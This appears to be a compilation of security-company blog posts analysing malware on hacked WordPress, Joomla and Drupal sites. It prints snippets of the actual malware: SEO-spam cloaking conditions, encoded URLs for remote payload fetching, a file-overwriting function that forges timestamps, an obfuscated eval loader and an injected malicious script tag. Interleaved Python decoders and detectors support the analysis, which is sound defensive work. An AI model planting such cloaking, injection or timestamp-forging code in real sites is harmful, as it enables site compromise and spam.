Hiding spam from Ahrefs and Majestic

Many black hat SEO campaigns use cloaking on hacked sites. Malicious scripts only inject spammy content when search engine crawlers request web pages on compromised sites. This time we came across an unusual cloaking condition.

We've been watching one spam campaign that uses php functions with names like __e_accelerate or __e_accelerate_engine for quite a long time. It normally used this cloaking condition:

if ((substr(trim($_SERVER['REMOTE_ADDR']),0,6)=='74.125') || preg_match("/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'])) {...

The spam is injected only if the page is requested from Google's IPs (Google has an IP range that begins with '74.125') or if the request's User-Agent header belongs to a crawler of one of the most popular search engines: Google, Bing, Yahoo, Ask, etc. This condition is more or less typical of the cloaking conditions used by the majority of other black hat SEO campaigns.

To our surprise, recently we found a variation of that e_accelerate malware that had the following cloaking condition:

if (!preg_match("/(ahrefs|majestic|baidu)/i", $_SERVER['HTTP_USER_AGENT'])) {...

So now this malware injects spam into pages requested by both search crawlers and humans. It only hides the spam from Ahrefs.com, Majestic (ex MajesticSEO) and Baidu. The exclusion rules look unusual, don't they?

Let's try to figure out what's going on. When checking the injected spammy text, I can see that it comes with scripts that make the text invisible in browsers that execute JavaScript (i.e. all modern browsers), so it's safe to "show" it to human visitors.

To understand why they hide their spam from Ahrefs, Majestic and Baidu, we should know what these sites do.

Baidu is the #1 Chinese search engine. By hiding spammy links from Baidu, they prevent them from ranking well in China. So they are simply not interested in Chinese traffic.

Ahrefs and Majestic are SEO tools that let you view the backlink profile of any domain. They have their own crawlers, and the volume of pages indexed by these tools is not much smaller than Google's index. This means that if we check information for the domains used in spammy links, we can easily find hacked sites that link back to them. So the goal of hiding spammy links from Ahrefs and Majestic is to prevent easy discovery of the sites hacked by this campaign.

By the way, they currently promote these sites:

  • buycialistadalafil[.]org
  • buycheapsildenafils[.]com
  • writemypaper-online[.]us
  • buy-essayforcheap[.]xyz

... and despite the spammers' efforts, Majestic has backlink profiles for some of them 😉

This malware can usually be found in WordPress index.php or in Joomla! includes/defines.php files. If you need professional help with cleanup, you can request it here

Pseudo-Darkleech in Drupal

It's just a minor update about the "pseudo-darkleech" malware we've been following for about a year now.

We wrote that it can usually be located inside the wp-includes/nav-menu.php file in WordPress and in the includes/defines.php file in Joomla! sites. But these are not the only targeted CMSes. We also find Drupal sites infected by this malware. The includes/bootstrap.inc file is where this malware can be found on Drupal sites.

The malware fetches the code it injects into webpages from third-party servers. The URLs of those servers are encoded using the base64 algorithm, e.g.:

$url = base64_decode("aHR0cDovLzkzLjE4OS40Mi43Mi9ibG9nLz9mcmFnaWxlJnV0bV9zb3VyY2U9MjQ2NzoyNjAzODM6NDU1");

Which decodes to hxxp://93 .189 .42 .72/blog/?fragile&utm_source=2467:260383:455.

But there are versions that use a custom encryption/decryption algorithm:

$url = decrypt_url('a3d3czksLDI2Mi0xMjQtNjQtMjQ7LGFvbGQsPGFmd2IldnduXHBsdnFgZj41NTQxOzk1MTA3MTs5NDQ0');

Here's the decryption function:

function decrypt_url($encrypted_url)
{
    $encrypted_url = base64_decode($encrypted_url);
    $url = '';
    for ($i = 0; $i < strlen($encrypted_url); $i++)
    {
        $url .= chr(ord($encrypted_url[$i]) ^ 3);
    }
    return $url;
}

So the decoded URL is hxxp://151 .217. 57 .178/blog/?beta&utm_source=66728:623428:777
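To verify the two encodings without running the malware's PHP, here is a Python port of its decrypt_url() plus a small extractor for the two call forms quoted above. This is added example code, not part of the original post; it also goes beyond the post by recovering the XOR key from the known "http" prefix, in case a variant changes the hard-coded 3. The two constants are the ones quoted in this post.

```python
import base64
import re

# XOR key hard-coded in the decrypt_url() routine quoted above.
XOR_KEY = 3

# The two URL constants quoted in this post (plain base64 and "encrypted" forms).
PLAIN_CALL = '$url = base64_decode("aHR0cDovLzkzLjE4OS40Mi43Mi9ibG9nLz9mcmFnaWxlJnV0bV9zb3VyY2U9MjQ2NzoyNjAzODM6NDU1");'
XOR_CALL = "$url = decrypt_url('a3d3czksLDI2Mi0xMjQtNjQtMjQ7LGFvbGQsPGFmd2IldnduXHBsdnFgZj41NTQxOzk1MTA3MTs5NDQ0');"

# Either call with a single base64-looking string literal as its argument.
CALL_RE = re.compile(r"(base64_decode|decrypt_url)\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decrypt_url(encrypted, key=XOR_KEY):
    """Port of the malware's decrypt_url(): base64-decode, then XOR every byte with the key."""
    raw = base64.b64decode(encrypted)
    return bytes(b ^ key for b in raw).decode("latin-1")


def extract_hidden_urls(php_source):
    """Find every hidden constant in a PHP snippet and return [(encoder, decoded_value), ...]."""
    found = []
    for encoder, literal in CALL_RE.findall(php_source):
        if encoder == "base64_decode":
            decoded = base64.b64decode(literal).decode("latin-1")
        else:
            decoded = decrypt_url(literal)
        found.append((encoder, decoded))
    return found


def guess_xor_key(encrypted, expected_prefix=b"http"):
    """Recover a single-byte XOR key from the known URL prefix (None if the bytes disagree)."""
    raw = base64.b64decode(encrypted)
    keys = {raw[i] ^ expected_prefix[i] for i in range(len(expected_prefix))}
    return keys.pop() if len(keys) == 1 else None
```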

The rest of the code doesn't change much so we reliably detect this malware when we clean sites, even if we didn't see pseudo-darkleech on some particular CMS before.

File Modification Date – not the Best Compromise...

Some webmasters only check recently modified files when searching for malware. It may work sometimes, but many infections don't change files' time-stamps. PHP's "touch" function allows setting any modification time on any file.

If hackers create a new file, they choose the time-stamp of some neighboring file. If they inject code into an existing file, they simply save its original modification date and then restore it after the injection.

Today I want to show you a piece of code that also sets a fake modification date on malicious files:

function change_content_of_file($file, $base64_content)
{
    $flag = false;

    @chmod($file, 0777);
    @chmod(dirname($file), 0777);
    $flag = @forceFilePutContents($file,  base64_decode($base64_content)) > 0;
    @chmod($file, 0444);
    @touch($file, time() - rand(60*60*24*30*12, 60*60*24*30*12*2));
    @touch(dirname($file), time() - rand(60*60*24*30*12, 60*60*24*30*12*2));
    @chmod(dirname($file), 0755);

    return $flag;
}

In this case, the code picks a random date between a year and two years back from now.

Don't limit your searches to recently modified files. Make sure to scan all files on your server. You don't have to do it manually. Integrity control systems will make the task much easier. Of course, you need to be absolutely sure all your files are clean at the moment when you put them under integrity control. If you already suspect that some of the files may contain malicious code then hire professionals - we'll scan all your files for thousands of malware patterns.
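Two checks that do not trust mtime, as an added Python example (not code from the post): one reproduces the effect of the quoted touch() call on a constructed sample file and flags it through the ctime/mtime gap, the other is a minimal hash baseline of the kind an integrity control system keeps. The ctime behaviour assumed here is POSIX: utime() can set mtime freely, but the kernel records the real time of that change in ctime.

```python
import hashlib
import os
import random
import tempfile
import time

ONE_YEAR = 60 * 60 * 24 * 30 * 12   # the malware's own "year": 360 days

def plant_backdated_file(directory):
    """Mimic the quoted change_content_of_file(): write a constructed sample, then push
    its mtime one to two years into the past (os.utime is Python's equivalent of touch())."""
    path = os.path.join(directory, "sample.php")
    with open(path, "wb") as fh:
        fh.write(b"<?php /* constructed sample, not real malware */ ?>")
    fake = time.time() - random.randint(ONE_YEAR, 2 * ONE_YEAR)
    os.utime(path, (fake, fake))
    return path

def looks_backdated(path, tolerance=60):
    """A ctime far newer than mtime means the timestamp was rewritten after the content.
    It is a lead, not proof: restores that preserve mtime (tar, rsync -a) look the same."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > tolerance

def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def changed_files(baseline, root):
    """Integrity check that ignores timestamps: every file whose hash differs from,
    or is missing in, the baseline taken while the site was known to be clean."""
    changed = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            if baseline.get(p) != sha256_of(p):
                changed.append(p)
    return sorted(changed)

def demo():
    """Build a clean baseline, plant a backdated file, run both checks."""
    workdir = tempfile.mkdtemp()
    clean = os.path.join(workdir, "index.php")
    with open(clean, "wb") as fh:
        fh.write(b"<?php // constructed clean file ?>")
    baseline = {clean: sha256_of(clean)}
    planted = plant_backdated_file(workdir)
    return looks_backdated(planted), looks_backdated(clean), changed_files(baseline, workdir)
```

A `find /var/www -newer` style search would miss the planted file entirely; the hash comparison catches it regardless of what its timestamps claim.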

CACHE START Russian Spam

We see quite a few sites with the following injected PHP code:

//###=CACHE START=###
error_reporting(0); 
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXF...skipped...Tyvqwg9"));'));
//###=CACHE END=###

This malware contacts dfoiqweomxa[.]ru and fetches spam links from there. The spam mainly promotes Russian phishing and money laundering sites. Infected sites can be found all around the world. We found this spam even on sites of American and international universities.

Obfuscated Links in the Captcha on Login WordPress...

Do you remember SweetCAPTCHA, which tried to monetize its WordPress plugin by injecting unwanted ads into web pages?

Today we found another CAPTCHA plugin with suspicious code. We cleaned a site and our scanner reported suspicious obfuscated code inside these files of the Captcha on Login plugin (45,000+ all-time installs):

captcha-on-login/index.php
captcha-on-login/templates/report.php
captcha-on-login/templates/options.php

The obfuscation had strings like this:

...
${ "GL\x4f\x42\x41LS" }[ "\x64\x78cq\x70c\x6ax\x77\x6f\x63\x72" ]
...

When we see such things, we always try to decode them to figure out whether it's legitimate or not.

...
public function options_page(){
$meu_link="http://vendacomtrafegogratuito [.]com .br";$meu_link2="hxxp://hotplus [.]net .br/plugin-hotlinks-plus/?clear";include("templates/options.php");
$meu_link="hxxp://vendacomtrafegogratuito [.]com .br";$meu_link2="http://hotplus [.]net .br/ plugin-hotlinks-plus/?clear";
}
...

It looks like the owner of this plugin, "Anderson Makiyama", is a Brazilian developer who owns these affiliate marketing websites:
hxxp://hotplus .net .br/ plugin-hotlinks-plus/
hxxp://funildevendasparainiciante .com .br/ onde-divulgar-links-de-afiliados/

This plugin seems only to show these links inside the WordPress admin interface, on the plugin options and report pages, as "Other products of the author" (Outros Produtos do Autor). It may be a bit annoying but doesn't seem to be a big deal. It's natural for plugin developers to pitch their other products (even such questionable ones) on the internal plugin pages (not visible to site users).

The only problem is that the link-injecting code is obfuscated. Not only does it trigger warnings from security scanners, but the practice is considered unacceptable by the official WordPress Plugin Directory guidelines:

4. No obfuscated code. We believe that obfuscated code violates the spirit, if not the letter, of the GPL license under which we operate....
...Intentionally obfuscated code is not the preferred form, and not allowed in the repository under any circumstances.

It's sad to see how plugins that are supposed to help stop hackers actually do things that resemble what hackers do. Sometimes you can find such plugins even in the official WordPress plugin directory.

If you are looking for alternative solutions against brute force attacks, you can check our Website Firewall.

IP Obfuscation Using Dots ………

Recently I analyzed a porn doorway script and found an interesting way to obfuscate an IP address there.

$adr1 = ".............................................................................................................................................................................";
$adr2 = "............................................................................................................................................................................................................................................";
$adr3 = ".................................................................";
$adr4 = "........................";
$ard = strlen($adr1).".".strlen($adr2).".".strlen($adr3).".".strlen($adr4);

In the above code, you can see that each byte of the IP address $ard is represented by a string of dots, where the number of dots in the string is the byte value.

This gives us the following IP address: 173 .236 .65 .24, which is used to generate a redirect URL for the doorway visitors:

header("Location: hxxp://$ard/input/?mark=20151119-$s");

In our case, the final redirect URL was hxxp://173 . 236 . 65 . 24/input/?mark=20151119-/azq9mzo3v
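A decoder for this dot-count trick, as an added Python example (not code from the post). The sample PHP is constructed here in the same shape as the doorway code above, with the dot counts the post reports (173, 236, 65, 24), so the same IP and the same defanged redirect come out; the regexes assume the variables are built with strlen() joined by "." as in the quoted snippet.

```python
import re

# Constructed sample in the shape of the doorway code quoted above.
SAMPLE = "\n".join([
    '$adr1 = "%s";' % ("." * 173),
    '$adr2 = "%s";' % ("." * 236),
    '$adr3 = "%s";' % ("." * 65),
    '$adr4 = "%s";' % ("." * 24),
    '$ard = strlen($adr1).".".strlen($adr2).".".strlen($adr3).".".strlen($adr4);',
    'header("Location: hxxp://$ard/input/?mark=20151119-$s");',
])

DOT_ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"(\.*)"\s*;')
STRLEN_ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*((?:strlen\(\$\w+\)(?:\s*\.\s*"\."\s*\.\s*)?)+)\s*;')
STRLEN_REF_RE = re.compile(r'strlen\(\$(\w+)\)')


def resolve_dot_lengths(php):
    """Map every variable assigned a pure run of dots to its dot count (the byte value)."""
    return {name: len(dots) for name, dots in DOT_ASSIGN_RE.findall(php)}


def resolve_ips(php):
    """Rebuild each variable composed of strlen() values joined by ".", e.g. $ard above."""
    lengths = resolve_dot_lengths(php)
    ips = {}
    for name, expr in STRLEN_ASSIGN_RE.findall(php):
        parts = [lengths[ref] for ref in STRLEN_REF_RE.findall(expr) if ref in lengths]
        if len(parts) == 4 and all(0 <= p <= 255 for p in parts):
            ips[name] = ".".join(str(p) for p in parts)
    return ips


def reveal_redirects(php):
    """Substitute the recovered IPs into header("Location: ...") calls to expose the targets."""
    ips = resolve_ips(php)
    targets = []
    for m in re.finditer(r'header\(\s*"Location:\s*([^"]+)"\s*\)', php):
        url = m.group(1)
        for name, ip in ips.items():
            url = url.replace("$" + name, ip)
        targets.append(url)
    return targets
```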

This code was found in thousands of .php doorway files created by the attackers. This is the sort of hack that may cause trouble even after you have completely cleaned your site. You can read about such scenarios on our blog. To prevent Googlebot from indexing and re-indexing tons of pages that shouldn't have been there in the first place, it may be a good idea to close spammy directories on your server with robots.txt directives.

If you find something like this on your server, it's only the tip of the iceberg. To stop the hackers, you also need to find and close all security holes (including the backdoors they uploaded to your site). If you need professional help with malware cleanup and site protection, please check our Website AntiVirus service.

New Wave of g00 Script Injections

Active during the past summer, the g00[.]co script injections are back with a new wave of infections this November.

The most common variation is:

<script src="hxxp: / / g00[.]co/BtFVPd"></script>

This short URL hides the hxxp://yourjavascript[.]com/3921156982/not.js script, which in turn opens hxxp://speedclick[.]info/app/amung.php?c=a&s= for visitors that come from Facebook, Google, Bing and Yahoo!

On the server side, the malware is mainly injected into WordPress theme files. Usually you can find the following PHP code (on a single line; line breaks added for readability) in either footer.php or functions.php:

if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")],
base64_decode("d3AtYWRtaW4=")) === false) 
{
echo base64_decode(base64_decode(base64_decode("VUVoT2Ft...skipped...edUFEwSw0K")));
}

It injects that g00 script into all site URLs that don't contain wp-admin.
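To peel the nested base64_decode() layers and recognise this injection pattern in a theme file, here is an added Python example (not code from the post). The sample is constructed to match the snippet above: the two single-layer constants are the ones quoted ("UkVRVUVTVF9VUkk=" and "d3AtYWRtaW4="), while the triple-encoded payload is a harmless placeholder tag built here, since the post skips the real one.

```python
import base64
import re

# Constructed stand-in for the skipped payload: a placeholder tag, not the real g00 script.
PAYLOAD = b'<script src="http://example.invalid/placeholder.js"></script>'
TRIPLE = base64.b64encode(base64.b64encode(base64.b64encode(PAYLOAD))).decode()

# Constructed sample in the shape of the footer.php/functions.php injection above.
SAMPLE = (
    'if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")], '
    'base64_decode("d3AtYWRtaW4=")) === false) { echo '
    'base64_decode(base64_decode(base64_decode("%s"))); }' % TRIPLE
)

# One or more nested base64_decode( wrappers around a single string literal.
CHAIN_RE = re.compile(r'((?:base64_decode\(\s*)+)"([A-Za-z0-9+/=]+)"(?:\s*\))+')


def peel(literal, layers):
    """Base64-decode the literal as many times as it is wrapped."""
    data = literal.encode()
    for _ in range(layers):
        data = base64.b64decode(data)
    return data.decode("latin-1")


def decode_chains(php):
    """Return (layers, plaintext) for every base64_decode(...) chain in the snippet."""
    out = []
    for m in CHAIN_RE.finditer(php):
        layers = m.group(1).count("base64_decode(")
        out.append((layers, peel(m.group(2), layers)))
    return out


def is_g00_style(php):
    """Flag the pattern from the post: a cloak on $_SERVER[REQUEST_URI] not containing
    wp-admin, plus a multi-layer encoded payload that gets echoed into the page."""
    chains = decode_chains(php)
    names = {text for _, text in chains}
    cloaks_on_uri = re.search(r'strpos\(\s*\$_SERVER\[', php) is not None
    return (cloaks_on_uri and "REQUEST_URI" in names and "wp-admin" in names
            and any(layers >= 2 for layers, _ in chains))
```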

As always, if you need site security monitoring and cleanup services, you can count on us.